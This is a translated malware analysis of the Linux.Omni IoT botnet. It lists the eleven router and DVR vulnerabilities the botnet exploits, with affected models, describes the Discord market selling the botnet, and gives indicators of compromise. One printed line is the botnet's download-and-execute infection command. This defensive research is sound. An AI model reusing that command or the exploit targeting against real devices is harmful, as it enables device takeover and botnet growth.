在本文中，我们进一步对现在活跃的Linux和IoT威胁的分类和分析，我们将深入探究最近被我们的蜜罐检测到的Linux.Omni僵尸网络恶意软件。Linux.Omni因其感染库包含了许多漏洞（总共11种）而引起了我们的注意，最终我们确定它是IoTReaper 的一个新版本。

二进制分析

我们首先注意到IoT设备感染时对恶意软件的标注，即OMNI，因为最近几周我们检测到了OWARI，TOKYO，SORA，ECCHI ......这些都是Gafgyt或Mirai的不同版本， 而且与之前报道的相比没有创新。

分析感染的方法，我们找到了下面的命令：

正如你所看到的，这是一个非常标准的脚本，所以我们认为这是从另一个僵尸网络导入的，并没有什么创新的成分。

虽然现有证据表明这是Mirai或Gafgyt的标准变体，我们还是下载了样本。

我们首先检测到二进制文件被UPX加壳。这在大多数样本是没有的，但在一些更广泛的僵尸网络变体也并不罕见。

查看二进制文件后，我们发现它的基本结构与Mirai一致。

但我们分析二进制感染选项后发现，在攻击方法方面，除了使用默认凭证进行扩散之外，Linux.Omni还使用了其他僵尸网络如IoTReaper或Okru/Satori等已经发现和利用的IoT设备漏洞，这其中就包括最近发现的GPON路由器漏洞。

让我们来看看Omni使用的这些漏洞：

Vacron

VACRON网络录像机中"board.cgi"参数存在代码注入的漏洞，该参数在HTTP请求解析中未得到很好的调试。 我们也在IoTReaper中找到了对于此漏洞的利用。

Netgear – CVE-2016-6277

另外一个Omni中利用的漏洞是CVE-2016-6277，这是通过对路由器“cgi-bin/”目录进行GET请求而进行的远程代码执行攻击。有此漏洞的路由器版本为：R6400，R7000R7000P，R7500R7800，R8000R8500，R9000。

D-Link – OS-Command Injection via UPnP

与IoTReaper一样，Omni使用D-link路由器的漏洞。 但是，IoTReaper使用的是hedwig.cgi参数cookie溢出的漏洞，Omni使用的则是UPnP端口漏洞。

Omni的POST请求如下:

我们可以找到对应的二进制命令：

存在漏洞的固件版本是：DIR-300 rev B – 2.14b01，DIR-600 – 2.16b01，DIR-645 – 1.04b01，DIR-845 – 1.01b02，DIR-865 – 1.05b03。

CCTV-DVR

另一个是影响70多个不同制造商的漏洞，它与“/ language / Swedish”资源相关联，允许远程执行代码。

有此漏洞的设备列在下面的链接中：

http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html

D-Link – HNAP

这是2014年报告的漏洞，已被恶意软件The Moon使用，该漏洞通过CAPTCHA绕过登录，并允许外部攻击者执行远程代码。

下面列出D-Link路由器有此漏洞的版本:

DI-524 C1 3.23,DIR-628 B2 1.20NA1.22NA,DIR-655 A1 1.30EA

TR-069 – SOAP

此漏洞已被Mirai僵尸网络在2016年11月利用，并导致了德国电信公司Deutsche Telekom ISP的网络瘫痪。

漏洞利用如下：

二进制命令：

Huawei Router HG532 – Arbitrary Command Execution

在华为HG532路由器中，可以通过修改HTTP请求来利用配置文件验证错误的漏洞。

此漏洞已在分析Okiru/Satori僵尸网络的文章中(Analysis of Linux.Okiru)被检测及分析。

Netgear – Setup.cgi RCE

Netgear路由器DGN1000 1.1.00.48固件中存在允许远程执行代码而无需事先验证的漏洞。

Realtek SDK

使用Realtek SDK和miniigd守护程序的不同设备都存在通过UPnP SOAP接口的命令注入漏洞。 对于这个漏洞的利用，如上面提到的华为HG532路由器，可以在Okiru / Satori僵尸网络样本中找到。

GPON

最后我们还发现上个月针对GPON路由器的最新漏洞，此漏洞已经整合到IoT僵尸网络和Linux服务器挖矿软件中。

同时，僵尸网络也通过默认凭证的方式实现扩散(这是我们的蜜罐系统被感染的方式)，这些凭证使用了与0x33不同的密钥进行XOR编码（0x33是各类僵尸网络版本通常使用的密钥），其中每个组合都使用不同的密钥。

架构分析

尽管攻击方式多种多样, 在受感染设备上运行的命令是一致的:

1

cd/tmp;rm-rf*;wget http://%s/{marcaDispositivo};sh/tmp/{marcaDispositivo}

下载的文件是bash脚本，它依据受感染设备的不同构架来下载样本。

我们看到上图的攻击与分析的示例不符，这专用于搜索具有漏洞的HTTP接口的设备，以及检查设备是否使用默认凭据，从而进一步进行两种类型的感染，1. 使用前面提到的11个漏洞，2. 报告暴露的HTTP服务或存在默认登陆凭据。

因此，Omni的架构非常类似于之前发现的IoTReaper僵尸网络的架构。

Omni幕后交易市场

通过调查二进制文件中的引用，我们找到IP地址213.183.53 [.] 120，它被作为样本的下载服务器。 尽管没有找到可用的目录列表（在其他变体中找到它是很常见的），但在根目录中我们找到了一个名为“Discord”平台，它一般被作为游戏玩家文本和语音聊天室。

由于它不需要任何权限或特殊邀请，我们起了一个特别黑客的名字，进入了聊天室。

进入以后我们发现，这个聊天室的主题并不是视频游戏，而是销售僵尸网络服务的平台。

在聊天室里呆了几分钟之后，我们发现Omni背后的人就是用户Scarface，他还依据同名电影"Scarface",制作一些非常"酷"的广告海报。

此外，聊天室里还提供技术支持，以及贴出了潜在消费者的请求 - 寻求其僵尸网络能够实现60 Gbps流量的证据。

我们可以找到一些有趣的行为表明这组网络犯罪分子非常不专业，比如说，Scarface展示了他/她从僵尸网络中获得的利润（以及数额是多么得不可思议），或者他们怎样地担心任何进入聊天室的人是警察。

因此，我们可以确定Linux.Omni恶意软件是IoTReaper恶意软件的更新版本，它使用了相同的网络架构，除此之外，还导入所有Mirai源代码。

下面列出了检测Linux.Omni恶意软件的Yara规则：

IoC

213.183.53[.]120
21aa9c42b42e95c98e52157fd63f36c289c29a7b7a3824f4f70486236a2985ff
4cf7e64c3b9c1ad5fa57d0d0bbdeb930defcdf737fda9639955be1e78b06ded6
6dfd411f2558e533728bfb04dd013049dd765d61e3c774788e3beca404e0fd73
000b018848e7fd947e87f1d3b8432faccb3418e0029bde7db8abf82c552bbc63
5ad981aefed712909294af47bce51be12524f4b547a63d7faaa40d3260e73235
31a2779c91846e37ad88e9803cbad8f8931e3229e88037f1d27437141ecbd164
528344fd220eff87b7494ca94caed6eae7886d8003ad37154fdb7048029e880b
cfca058a4d0a29b3da285a5df21b14c360fb3291dff3c941659fe27f3738ba3e
2b32375864d0849e676536b916465a1fbb754bbdf783421948023467d364fb4c
700c9b51e6f8750a20fcc7019207112690974dcda687a83626716d8233923c17
feb362167c9251dd877a0d76d3b42b68fcd334181946523ca808382852f48b7d
ca6bc4e4c490999f97ee3fd1db41373fc0ba114dce2e88c538998d19a6f694da
fc4cfc6300e3122ef9bbe6da3634d3b9839e833e4fc2cea8f1498623398af015
0fd93aeb2af3541daa152d9aff8388c89211b99d46ead1220c539fa178543bca
02a61e1d80b1f25d161de8821a31cd710987772668ce62c8be6d9afabe932712
377a49403cef46902e77ff323fcc9a8f74ea041743ccdbff41de3c063367c99a
812aa39075027b21671e5a628513378c598aef0feb57d0f5d837375c73ade8e8
c9caccd707504634185ee2a94302e3964fb6747963e7020dffa34de85bd4d2ce
a159c7b5d2c38071eb11f5e28b26f7d8beaf6f0f19a8c704687f26bfa9958d78
5eb7801551ee15baec5ef06b0265d0d0cc8488f16763517344bb8456a2831b82
2f1d0794d24b7b4f164ebce5bdde6fccd57cdbf91ea90ec2f628caf7fd991ce4

(原文为西班牙语)

原文链接：https://www.securityartwork.es/2018/11/08/analysis-of-linux-omni/

编译：看雪翻译小组 一壶葱茜

校对：看雪翻译小组 Lipss

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法